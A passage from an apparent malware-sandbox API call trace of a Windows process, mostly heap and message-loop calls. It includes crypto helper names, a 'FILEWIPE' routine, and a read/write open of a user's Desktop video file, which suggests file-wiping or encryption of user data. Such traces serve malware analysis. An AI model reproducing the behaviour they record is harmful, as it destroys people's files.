returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.929] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.929] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.929] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.929] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.929] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.929] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.929] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0167.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.929] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.930] FreeLibrary (hLibModule=0x74f20000) returned 1 [0167.930] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.930] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.930] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.931] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.945] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0167.945] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.947] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0xfe74e650, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0x90af58 [0167.947] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0167.947] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.947] CharLowerBuffW (in: lpsz="byte[98954]", cchLength=0xb | out: lpsz="byte[98954]") returned 0xb [0167.948] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.948] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0167.948] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.948] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0167.949] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0167.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.949] FreeLibrary (hLibModule=0x75c90000) returned 1 [0167.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.949] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0167.949] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0167.950] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.950] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.950] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.951] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.951] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0167.952] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.952] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0167.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0167.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urmveyqgrc9wpf_wa.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.952] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9dd418 | out: hHeap=0x8a0000) returned 1 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.953] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0167.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.954] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: 